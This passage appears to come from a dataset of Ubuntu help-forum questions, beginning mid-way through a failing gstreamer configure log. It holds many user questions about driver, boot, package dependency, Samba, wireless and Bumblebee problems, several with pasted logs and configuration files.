yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for shl_load ... no checking for shl_load in -ldld ... no checking for dlopen ... no checking for dlopen in -ldl ... yes checking whether a program can dlopen itself ... yes checking whether a statically linked program can dlopen itself ... yes checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking whether nls is requested ... yes checking for msgfmt ... /bin/msgfmt checking for gmsgfmt ... /bin/msgfmt checking for xgettext ... /bin/xgettext checking for msgmerge ... /bin/msgmerge checking for ld used by gcc ... /bin/ld -m elf_x86_64 checking if the linker ( /bin/ld -m elf_x86_64 ) is gnu ld ... yes checking for shared library run path origin ... done checking for cfpreferencescopyappvalue ... no checking for cflocalecopycurrent ... no checking for gnu gettext in libc ... yes checking whether to use nls ... yes checking where the gettext function comes from ... libc checking for pkg-config ... /bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for valgrind ... no configure : using gstreamer base plug-ins source release as package name configure : using unknown package origin as package origin configure : using gst_pkg_config_path = $ ( top_builddir ) /pkgconfig configure : using /usr/local/libexec/gst-install-plugins-helper as plugin install helper configure : *** checking feature : building of plug-ins with external deps *** configure : building external plug-ins configure : *** checking feature : building of experimental plug-ins *** configure : not building experimental plug-ins checking whether byte ordering is bigendian ... no checking for special c compiler options needed for large files ... no checking for _file_offset_bits value needed for large files ... no checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking for gcc option to accept iso c99 ... -std=gnu99 checking for gcc -std=gnu99 option to accept iso standard c ... ( cached ) -std=gnu99 checking whether gcc -std=gnu99 and cc understand -c and -o together ... yes checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking how to run the c++ preprocessor ... g++ -e checking for ld used by g++ ... /bin/ld -m elf_x86_64 checking if the linker ( /bin/ld -m elf_x86_64 ) is gnu ld ... yes checking whether the g++ linker ( /bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking for g++ option to produce pic ... -fpic -dpic checking if g++ pic flag -fpic -dpic works ... yes checking if g++ static flag -static works ... no checking if g++ supports -c -o file.o ... yes checking if g++ supports -c -o file.o ... ( cached ) yes checking whether the g++ linker ( /bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking dynamic linker characteristics ... ( cached ) gnu/linux ld.so checking how to hardcode library paths into programs ... immediate configure : working c++ compiler found : yes checking for valgrind ... /bin/valgrind checking for gobject-introspection ... yes checking for gtkdoc-check ... /bin/gtkdoc-check checking for gtkdoc-rebase ... /bin/gtkdoc-rebase checking for gtkdoc-mkpdf ... /bin/gtkdoc-mkpdf checking whether to build gtk-doc documentation ... no configure : looking for python version > = 2.1 checking for python ... /bin/python checking `` /bin/python '' : ... okay checking local python configuration ... looks good checking whether to build plugin documentation ... no ( gtk-doc disabled or not available ) checking for cos in -lm ... yes checking for ansi c header files ... ( cached ) yes checking xmmintrin.h usability ... yes checking xmmintrin.h presence ... yes checking for xmmintrin.h ... yes checking emmintrin.h usability ... yes checking emmintrin.h presence ... yes checking for emmintrin.h ... yes checking for sys/socket.h ... yes checking for process.h ... no checking for sys/types.h ... ( cached ) yes checking for sys/wait.h ... yes checking for sys/stat.h ... ( cached ) yes checking for stdint types ... stdint.h ( shortcircuit ) make use of stdint.h in _stdint.h ( assuming c99 compatible system ) checking for localtime_r ... yes checking for gmtime_r ... yes checking for log2 ... yes checking for _largefile_source value needed for large files ... no checking for lrint ... yes checking for lrintf ... yes checking whether gcc -std=gnu99 implements __pretty_function__ ... yes checking whether gcc -std=gnu99 implements __function__ ... yes checking whether gcc -std=gnu99 implements __func__ ... yes checking for glib ... yes checking for glib-genmarshal ... glib-genmarshal ( from pkg-config path ) checking for glib-mkenums ... glib-mkenums checking for gio ... yes checking for orc ... no checking for gst ... no configure : no package 'gstreamer-1.0 ' found configure : error : no gstreamer-1.0 > = 1.0.0 ( gstreamer ) found i need help because i am still trying to learn the basics ! ! thank you ! !
384061	ubuntu 12.04 boot to blank screen after upgrading nvidia graphic driver	i installed an ubuntu 12.04 from cd , then upgraded the device driver for my nvidia fx 1800 from the `` additional drivers '' section at `` system settings '' . after rebooting my desktop screen turns to blank after a quick splash of ubuntu boot image . now key stroke response , ctrl-alt-fx does n't work . i can hit shift to enter recovery mode . inside that mode what shall i do ? thanks .
384062	how do i create and tune an ext4 partition from the command-line ?	partitioning ( e.g . fdisk ) what are some useful commands used for partitioning an additional hard drive from the command-line ? since most published guides steer towards gparted and other graphical utilities , a summary of some command-line sequences would be helpful . tuning - reserved space , write-back & access times how to remove the reserved disk space set aside ( by default ) in case the drive becomes 100 % full . since i is a secondary drive simply for 'data ' , removing the reserved area ensures the whole drive is available for use . i 'm also curious about write-through vs. write-back and skipping the update of access times ( on files and directories ) so as to improve performance .
384064	sometime keyboard and touchpad not working after ubuntu 13.10 upgrade	i upgraded to ubuntu 1310 now sometime keyboard and touchpad does n't work on my laptop my laptop is acer aspire 4935 ! anyone know how i can fix this ?
384065	13.10 update , after restarting it checks everything and goes to a black screen	when it restarts from the update it goes to a black screen and runs commands and it says [ ok ] after them and then it says something about daemon preload or something and then it goes to a blank black screen and i ca n't log in or do anything , i have no idea how to fix this , please help
384068	steam , and blender flicker on startup	so i have this problem when i try to start blender and or steam , the window flickers . like some sort of visual problem . it does not happen when i first log in , only after i have had other programs running , i thought if i close other programs it would fix the problem but nothing , only if i log off and back in . does not make sense . i have 32 gb ram , i7 cpu , radeon hd 7970 gpu , triple monitor . running the fglrx-updates ( propietry ) driver .
384070	i can not change the wlan0 mode . why ?	-- ralink rt3290 , ubuntu 12.04 , hp pavilion-g4 laptop -- i 'm using my university 's wifi.i tried to change the wlan0 mode from `` managed '' to `` monitor '' mode . but i got an error message : error for wireless request `` set mode '' ( 8b06 ) : set failed on device wlan0 ; invalid argument . what 's my problem ?
384071	failure to logon	i have installed ubuntu 13.10 three different times with netboot cd 5.2 and ca n't get past the black login screen . it asks for my username and password and that goes okay . then is sends me down the screen to a prompt the ends in ( ~ $ ) . what am i suppose to enter after that prompt . i 'm new with linux and do n't quite understand the language . i believe it 's asking me for a command to initiate the ubuntu operating system . maybe ? i 'm getting a little tired of installing and reinstalling and coming up with the same thing when i 'm sure i 'm just lacking the right command to enter .
384074	/var/log/boot.log incomplete	my core issue is that something is causing udev to spew thousands of messages during boot , slowing down boot by 10 minutes . my interrim issue however is that there are so many messages during boot that my /var/log/boot.log file is incomplete . the file seems to start at an arbitrary point near the end of the udev spew , then shows me the rest of the boot process . how do i make sure that i get a log of the entire boot process ? currently i am getting just the last 35k of output ( 35741 bytes ) . secondarily , the udev messages that i see in boot.log do n't show up in any of the other logs , which surprises me . i see messages of a similar form ( from udev ) in syslog and daemon.log dating from earlier boots which did n't manifest the above issue . maybe this is all caused by some reconfiguration which caused these messages to be logged to the console rather than syslog ? my /usr/share/rsyslog/50-default.conf looks like this . it 's ubuntu 12.04.3 lts , precise .
384075	restore hp envy dv6 to factory settings	i bought a hp envy dv6 and tried to dual boot with ubuntu 13.04 . since i could n't get it to work , i figured out that i could do it with windows 7 . the thing is that the wifi drivers are n't available , so that meant that i could n't install any other driver . after that i installed ubuntu over windows 7 and i think that just deleted all the factory partitions . now i want to make a system recovery to a factory restore but i ca n't . this is very complicated for me , i hope someone can help me .
384077	dual booting ubuntu 13.10 and win 8 on asus s400ca	i recently got my new laptop and right away installed ubuntu 13.10 by mounting \ onto the 24gb ssd cache of my machine while \home onto 150000 mb of the hdd and swap onto 8gb of the hdd . i installed ubuntu using uefi ( not legacy , or csm in my case ) . i then tried to boot my win 8 but found that it can not be repaired by the automatic repair program of windows . i installed and ran boot repair in ubuntu but it did n't help . so i ran it again choosing to create a bootinfo summary file . here it is . http : //paste.ubuntu.com/6497647/ also , i turned off fast boot and secure boot before installing ubuntu , and my disk was in ahci mode ( not raid ) . i would like my win 8 to dual boot with ubuntu , together caching in ssd . or at least , ubuntu caches in ssd while windows boots from hdd . i really hope someone can enlighten me . thank you ,
384078	adding kde backports ppa has caused unmet dependencies . how to fix ?	i added ppa : kubuntu-ppa/backports in the usual way , then performed a dist-upgrade . it needed to download over gigabyte of files , so i left if for the afternoon . upon my return , i found that the system had become very unstable and unusable . i logged in at the console and rebooted it from there and when i got back in , things are somewhat messed up . i ran sudo apt-get -f dist-upgrade and noticed the following in the output : the following packages will be upgraded : kdm 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/2,227 kb of archives . after this operation , 1,668 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of kdm : kdm depends on kde-workspace-kgreet-plugins ( = 4:4.8.5-0ubuntu0.3 ) ; however : version of kde-workspace-kgreet-plugins on system is 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 . kde-workspace-data ( 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 ) breaks kdm ( < < 4:4.10.80 ) and is installed . version of kdm to be configured is 4:4.8.5-0ubuntu0.3 . dpkg : error processing kdm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kubuntu-desktop : kubuntu-desktop depends on kdm ; however : package kdm is not configured yet . dpkg : error processing kubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached errors were encountered while processing : kdm kubuntu-desktop e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ideally i 'll like to satisfy the dependencies , so if possible , can someone advise how to do that please . failing that , please advise how to role-back to previous configuration . thanks . using ubuntu 12.04 with kernel 3.8.0-34-generic # 49~precise1-ubuntu ** update ** peter @ pete : ~ $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run ‘apt-get -f install’ to correct these . the following packages have unmet dependencies . kde-workspace-data : breaks : kdm ( < 4:4.10.80 ) but 4:4.8.5-0ubuntu0.3 is installed kdm : depends : kde-workspace-kgreet-plugins ( = 4:4.8.5-0ubuntu0.3 ) but 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 is installed e : unmet dependencies . try using -f. peter @ pete : ~ $ peter @ pete : ~ $ peter @ pete : ~ $ sudo apt-get -f check reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done update 2 peter @ pete : ~ $ apt-cache policy kde-workspace-data kdm kde-workspace-data : installed : 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 candidate : 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 version table : *** 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 100 /var/lib/dpkg/status 4:4.11.1-0ubuntu1~ubuntu12.04.1~ppa3 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 4:4.11.0-0ubuntu1~ubuntu12.04~ppa1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 4:4.10.5-0ubuntu0.1~ubuntu12.04~ppa2 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 4:4.8.5-0ubuntu0.3 0 500 http : //free.nchc.org.tw/ubuntu/ precise-updates/main i386 packages 4:4.8.2a-0ubuntu4 0 500 http : //free.nchc.org.tw/ubuntu/ precise/main i386 packages kdm : installed : 4:4.8.5-0ubuntu0.3 candidate : 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 version table : 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages *** 4:4.8.5-0ubuntu0.3 0 500 http : //free.nchc.org.tw/ubuntu/ precise-updates/main i386 packages 100 /var/lib/dpkg/status 4:4.8.2a-0ubuntu4 0 500 http : //free.nchc.org.tw/ubuntu/ precise/main i386 packages update 3 peter @ pete : ~ $ sudo apt-get install kde=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 kde-workspace-data=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 kde-workspace-kgreet-plugins=4:4.11.kspace-data=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 kde-workspace-kgreet-plugins=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 reading package lists ... done building dependency tree reading state information ... done e : version ‘4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1’ for ‘kde’ was not found peter @ pete : ~ $ peter @ pete : ~ $ apt-cache policy kde-workspace-data kdekde-workspace-data : installed : 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 candidate : 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 version table : *** 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 100 /var/lib/dpkg/status 4:4.11.1-0ubuntu1~ubuntu12.04.1~ppa3 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 4:4.11.0-0ubuntu1~ubuntu12.04~ppa1 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 4:4.10.5-0ubuntu0.1~ubuntu12.04~ppa2 0 500 http : //ppa.launchpad.net/kubuntu-ppa/backports/ubuntu/ precise/main i386 packages 4:4.8.5-0ubuntu0.3 0 500 http : //free.nchc.org.tw/ubuntu/ precise-updates/main i386 packages 4:4.8.2a-0ubuntu4 0 500 http : //free.nchc.org.tw/ubuntu/ precise/main i386 packages kde : installed : ( none ) candidate : ( none ) version table : update 4 peter @ pete : ~ $ sudo apt-get -f install kdm=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 kde-workspace-data=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 kde-workspace-kgreet-plugins=4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 reading package lists ... done building dependency tree reading state information ... done kde-workspace-data is already the newest version . kde-workspace-data set to manually installed . kde-workspace-kgreet-plugins is already the newest version . kde-workspace-kgreet-plugins set to manually installed . the following packages were automatically installed and are no longer required : libkasten1controllers1 libnepomukdatamanagement4 libkface1 libkexiv2-10 libkdegames5a libkipi8 libkggzgames4 libopencv-legacy2.3 ttf-dustin libkasten1okteta1core1 libkggznet4 libkggzmod4 libopencv-video2.3 libkasten1okteta1gui1 libkasten1okteta1controllers1 libanalitza4abi1 libkwinnvidiahack4 ktron libkdecorations4 libkwinglutils1 libkasten1core1 rdesktop libboost-graph1.46.1 libnepomuksync4 libopenctl0.8 libokularcore1abi1 libindi0 libkasten1gui1 kbattleship libplasmaclock4abi3 libkdcraw20 libanalitzagui4abi1 libattica0.3 kdevplatform5-libs liblastfm0 libsolidcontrolifaces4abi2 libsublime5 libkwineffects1abi3 use 'apt-get autoremove ' to remove them . the following packages will be upgraded : kdm 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/2,227 kb of archives . after this operation , 1,668 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of kdm : kdm depends on kde-workspace-kgreet-plugins ( = 4:4.8.5-0ubuntu0.3 ) ; however : version of kde-workspace-kgreet-plugins on system is 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 . kde-workspace-data ( 4:4.11.3-0ubuntu0.1~ubuntu12.04~ppa1 ) breaks kdm ( < < 4:4.10.80 ) and is installed . version of kdm to be configured is 4:4.8.5-0ubuntu0.3 . dpkg : error processing kdm ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . dpkg : dependency problems prevent configuration of kubuntu-desktop : kubuntu-desktop depends on kdm ; however : package kdm is not configured yet . dpkg : error processing kubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . errors were encountered while processing : kdm kubuntu-desktop e : sub-process /usr/bin/dpkg returned an error code ( 1 )
384079	accessing windows certs in ubuntu	i 've dual booted my laptop windows 7/ubuntu 12 . i 've got a bunch of corporate certificates on the windows partition that i need to access to use the corporate network . how can i do this ? i can not export the certs because i need the private key which is locked . i tried using jailbreak , but it 's not working either - the application just says that it 's still locked . i checked the machinekeys permissions and set them correctly . but , when it tries to change the permissions to the encrypted child files it fails with `` access denied '' . is there any way that i can just decrypt these files and point the ubuntu certs to the windows partition ?
384082	wireless ad-hoc in ubuntu 13.04 not working on an android phone	i am connected to a wifi network . i tried to create a new wireless network and connect it to my android mobile . but when the new network shows is there any provision to connect this to my android mobile and to use the int connected , the wifi which i am using to access internet gets disconnected . i want to connect to internet in phone via laptop .
384083	trying to access my ubuntu server via a domain name registered via godaddy	i am trying to host my own web server . so i registered a domain name example.com via godaddy . i have an a record of example.com pointing to 12.34.56.78 ( my wan ip address ) . i have nginx setup on ubuntu and can access it via the lan ip address . the problem is i ca n't enter example.com from outside my home . i remembered to forward port 80 requests to my ubuntu server . is there something i was supposed to do in /etc/hosts or /etc/hostname ? also in /etc/nginx/site-available/default , am i supposed to comment out server_name localhost and put server_name example.com instead ? could someone please help me .
384086	want to install pre existing ubuntu os into parallels on windows 7	my question is , is it possible ? i do n't have an external hardrive , or anyway to back up my existing ubuntu os . i thought of copying my entire ubuntu file system directly over to my windows side , since you can mount the windows os in ubuntu 12.04 , but it says i do n't have permission , but i 'm admin of my computer . so is there another way ? or maybe a fix ?
384088	upstart-socket-bridge and python3 example	i 'm trying to get upstart-socket-bridge to pass the socket to a python3 application . are there any working examples of u-s-b using python 2 or 3 ? this example is a test setup only . u-s-b launches the python3 application , but the file descriptor from upstart seems invalid . # edited to remove lots of debug lines import os , traceback , socket fd = os.environ [ `` upstart_fds '' ] # log the socket connection activity with open ( `` /tmp/socket-test-outfile '' , 'w ' ) as outfile : outfile.write ( `` debug : fd= { } \n '' .format ( fd ) ) try : s = socket.fromfd ( fd , socket.af_inet , socket.sock_stream ) s.listen ( 1 ) conn , addr = s.accept ( ) outfile.write ( `` { } \n '' .format ( conn.recv ( 1024 ) .decode ( 'utf-8 ' ) ) ) except : outfile.write ( `` s error : { } \n '' .format ( traceback.print_exc ( ) ) ) outfile.close ( ) fd = 10 on all attempts so far . but that fd does n't produce a useful socket that i can accept ( ) and read ( ) . the error output is none > > > import socket > > > s = socket.fromfd ( 10 , socket.af_inet , socket.sock_stream ) traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python3.3/socket.py '' , line 219 , in fromfd nfd = dup ( fd ) oserror : [ errno 9 ] bad file descriptor how can i get upstart-socket-bridge working with python ?
384090	installing gcc cross-compiler for i586-elf	i was following a tutorial http : //wiki.osdev.org/main_page to build an os . i needed to install a cross compiler for i586-elf ( executable and linkable format ) . how to install it on ubuntu 12.04 ?
384091	how to install afni ? `` unable to locate package libxp ''	i am trying to follow some instructions given to me for downloading afni on ubuntu . the first thing it tells me to do in the terminal is : sudo yum install libxp tcsh sudo yum install pyqt4 r but it says yum : command not found . so i found , online , this command : sudo apt-get install libxp tcsh but it tells me e : unable to locate package libxp also , for pyqt4 and for r i read online to do : sudo apt-get update and sudo apt-get upgrade but it still does n't work . i read other things about changing sources.list file , but i 'm not understanding what i should change in this file . how do i get this to work ? thanks for any help !
384092	installing ubuntu with wubi error	toshiba satellite u845w-s400 . i installed ubuntu onto my hard drive without a partition using wubi . then , after the installation was complete , and my computer rebooted . ubuntu loaded and ran a program that finished up the setup and then an error appeared that said no root system file defined . what do i do ? im very new to code and ubuntu , and can someone give me simple instructions on how to fix this issue ?
384093	how to prevent login directly to my defaul desktop ?	i installed lxde on my os . but when i start up my os it does n't take me to the login screen it just boots to the default de right away . how do i make it so that i can boot into lxde right away ? or how do i boot lxde from terminal ?
384095	i 'm having problem starting my wifi with airmon-ng	so i have done all the instructions on how to install the aircrack and reaver and when i start the wlan0 i got this message in the terminal found 3 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 1025 networkmanager 1075 wpa_supplicant 1235 dhclient interface chipset driver wlan0 unknown rt2800pci - [ phy0 ] error : neither the sysfs interface links nor the iw command is available . please download and install iw from http : //wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2
384098	xmarks wo n't download bookmarks in directories with depth greater than 1 from the bookmarks toolbar folder	on this ubuntu installation , xmarks has yet to successfully download a perhaps large tree of book marks . on a windows machine it takes maybe a minute and a half to finish downloading the account . on another ubuntu installation it would time out repeatedly but it randomly successfully downloaded the account , though it certainly took an extended length of time . on this particular ubuntu installation , which is the same version as the successfully downloaded one , the bookmark download loading bar exhibits the following behavior : scrolls about 10 seconds in , hangs for 30 seconds continues scrolling indefinitely the bookmark folder directory tree is downloaded and the bookmark files in directories that are the children of the bookmarks toolbar directory folder are downloaded , but further descandant directories are empty . if you have encountered this error , did you try settings up a local xmarks server resolve it ? is it possible to resolve this ? has this been reported to the xmarks developers previously ? system : firefox 25 ubuntu 12.04.3
384101	widows 8 bcd missing/errors dual boot	i just installed an ubuntu partition on my lenovo g500s without any errors , but when i went to make sure that my windows 8 partition was functioning , i got this error code upon booting : `` 0xc000000e '' . all of my partitions are intact , and i can mount and view the files on my windows 8 partition in ubuntu . when i check the filesystem of my windows partition , it immediately returns `` not clean '' . is there a way i can recover the windows 8 bcd by utilizing files in the windows 8/8 re partitions that i can access ? or any other solutions ?
384102	sudo apt-get update command showing failed to fetch some archive and ignored some of them	i have newly installed ubuntu 12.04 system . i tried to get update using command but i am getting following type of error messages . ign http : //archive.ubuntu.com precise inrelease err http : //security.ubuntu.com precise-security/restricted translation-en_us unable to connect to 192.168.1.51:3128 : and failed to fetch some archive .
384104	backup ubuntu + apache + postfix ( no bash )	my company has 10 laptops and a server with ubuntu onboard . there are also apache and postfix on it . i 'm totally new to ubuntu ( i have never used it and i believe i have no need to try it ) . but for the moment my company have fired our admin and i have to take a look for the server . could you suggest me an idea of how to backup the described infrastructure with minimum efforts ( something like windows-style several clicks backup ) . please do n't address to google as the most solutions there use bash and i have never used it .
384110	can i use hyper-v gen 2 with ubuntu ?	i tried to install ubuntu 13.10 on my windows 8.1 pro laptop . now installing it as a gen 1 works fine but installing it as a gen 2 does not . i have to disable secure boot to get anything to happen which is expected but when i disable it i just get into grub version 2 with a couple options . no matter which i choose i get a blank screen and nothing happens . am i doing something wrong or am i missing any steps or is hyper-v not going to be able to run ubuntu as a gen 2 virtual machine ?
384113	can i prevent my system reading any usb files ?	i have some computers around me . i do n't want any one to insert any usb . am afraid someone has malware in the usb when inserting in one computer it will infect the others becouse they are connected each other and that happend last time when i brought some experts to fix them . i want to prevent this and make the system does n't allow any files of working or even reading files . is that possible ?
384115	can n't install libjpeg.so.62	i 'm on ubuntu 12.04 . i am trying to install fslview software : http : //fsl.fmrib.ox.ac.uk/fsl/fslwiki/ but i get an issue when installing third script , libjpeg.so.62 : can not open shared object file : no such file or directory however , i can not used sudo apt-get install libjpeg62 , there is no internet connect . how to solve this ?
384119	ralink rt3290 kernal panic after installing drivers	i have recently bought a hp m6 sleekbook and made it dual boot ( windows 8 and ubuntu 12.04 ) but my wireless card wo n't work ! its a ralink rt3290 . i 've read countless posts about this and followed the instructions on almost all of them ( firstly this one http : //ubuntuforums.org/showthread.php ? t=2104690 ) but every time i reboot/try to use the internet after installing i get a kernal panic , i ca n't find a way to solve this anywhere ! lots of people are getting this kernal panic but i have n't seen any answers on how to solve it please help !
384120	how to set up group write permissions on new created files on cifs mount point ( samba/fstab )	i try to mount a samba share with cifs and set write permission to the group on the default file/directory creation mask . after hours spent searching the web and trying , i ca n't get this to work , all my files are created with `` rw-r -- r -- '' and i want `` rw-rw -- -- '' my serveur is a debian on cubieboard ( cubian r4 ) all umasks of all users are set to 002 using /etc/pam.d/common-session file with `` session optional pam_umask.so umask=002 '' this works great . my client is ubuntu desktop 64bit 13.10 . all umasks of all users are set to 002 using /etc/bash.bashrc file with umask 002 ( because the pam_umask.so does n't work on the client ) . this works great too . user `` bertrand '' and group `` nas '' exist on both the client and the server . on the server , user `` bertrand '' has only one group `` nas '' . on the client , user `` bertrand '' has `` nas '' as secondary group . user bertrand has same password on client , server and samba server . = > /etc/samba/smb.conf on the server : [ global ] server string = % h map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 name resolve order = lmhosts host wins bcast dns proxy = no wins support = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb [ nas ] comment = nas drive path = /media/usbnas valid users = @ nas force group = nas read only = no create mask = 0660 directory mask = 0771 = > /etc/fstab on the client : //smbserver/nas /media/nas cifs uid=bertrand , gid=nas , credentials=/root/.smbcredentials 0 0 the .smbcredentials contains : username=bertrand password=******** the mounting point works on my client , i can browse my nas , create , delete , modify files and directories but all new files and all new directories always has read only permission for group . how to give group write permissions by default ? thanks .
384122	ubuntu 13.10 is still beta !	i wish to upgrade my current ubuntu 13.04 to 13.10 . while upgrading via software updater , it popped up a window with information that `` ubuntu 13.10 is beta '' . so , may i know when it would be beta-free ? as it 's beta , so can it be reckoned stable or once it 's free of beta then only it 's stable ? is it preferred or advantageous to not upgrade my system now and put off until it 's beta-free ?
384129	do sony cameras with memory stick work with ubuntu ?	i 'm considering buying a sony cybershot camera that uses memory stick . would ubuntu have any problems working with that format ? can i just connect the camera to my computer using usb cable to upload photos ? thanks .
384131	how to change the app icons of linux mint to defaults ?	the icons of firefox , gimp , inkscape etc . are different . how to get back the original icons ? can it be done together ( for all apps ) ? linux mint icon : original icon :
384134	network connctivity option ( up and down arrow ) at the upper right panel is dissappeared	accidentally the the network connectivity option up and down arrow ) at the upper right panel has been deleted from my panel . i have tried a lot to get it back to the panel , but not able to get any solution . please suggest a solution .
384137	i am stuck at logout screen	i am new user of ubuntu . first i had a lot of problem using ubuntu . now i am facing logout error . when i logout ( top right icon , log out ) , the screen is appear black and nothing happen . how can i fix this error ? sorry for my bad english .
384138	under clocked cpu ( apu ) in ubuntu 12.04 lts	my laptop has a amd a6-3410mx apu , i 'm only seeing 800 mhz for my cpu speed ( it 's usually 1.6 ghz on win7 ) and does my cpu has the same over-clock-it-self capability as in win7 ?
384140	`` error : no such partition entering rescue mode ... grub rescue > ''	i have tried mostly all of the solutions in askubuntu page.but no positive results . i am new to linux , indeed ubuntu .
384141	bumblebee does not work in my lenovo g580 laptop	i 'm pulling my hair trying to get this out . since i know there is an issue with bumblebee and my laptop i 've installed one of the latest stable kernels , so uname -r gives me 3.12.1-031201-generic now lspci -nn | grep '\ [ 030 [ 02 ] \ ] : ' shows 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 01:00.0 3d controller [ 0302 ] : nvidia corporation gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] [ 10de:1140 ] ( rev a1 ) but still unable to run optirun , with throws ( optirun -vv firefox ) : [ 1029.729132 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1029.729505 ] [ info ] configured driver : nvidia [ 1029.729560 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 1029.729567 ] [ debug ] socket closed . [ 1029.729579 ] [ error ] could not connect to bumblebee daemon - is it running ? the nvidia drivers i 'm trying to use are nvidia-319-updates , just in case olders wo n't recognize my gpu i do n't know wich other info could be important , here are is more info . sudo lshw -c video *-display unclaimed description : 3d controller product : gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d2000000-d2ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:3000 ( size=128 ) *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : d3000000-d33fffff memory : e0000000-efffffff ioport:4000 ( size=64 ) bumblebee.conf : driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-319-updates pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia if i do a modprobe nvidia i get : vivo @ vivopc : ~ $ modprobe nvidia fatal : module nvidia not found . vivo @ vivopc : ~ $ modprobe nvidia-319-updates fatal : module nvidia_319_updates not found . please , tell if you need any more info
384148	how to unlock any stream video in a squid ?	i want to know how can i unlock any video in a internet that use squid . my ubuntu is 13.10 .
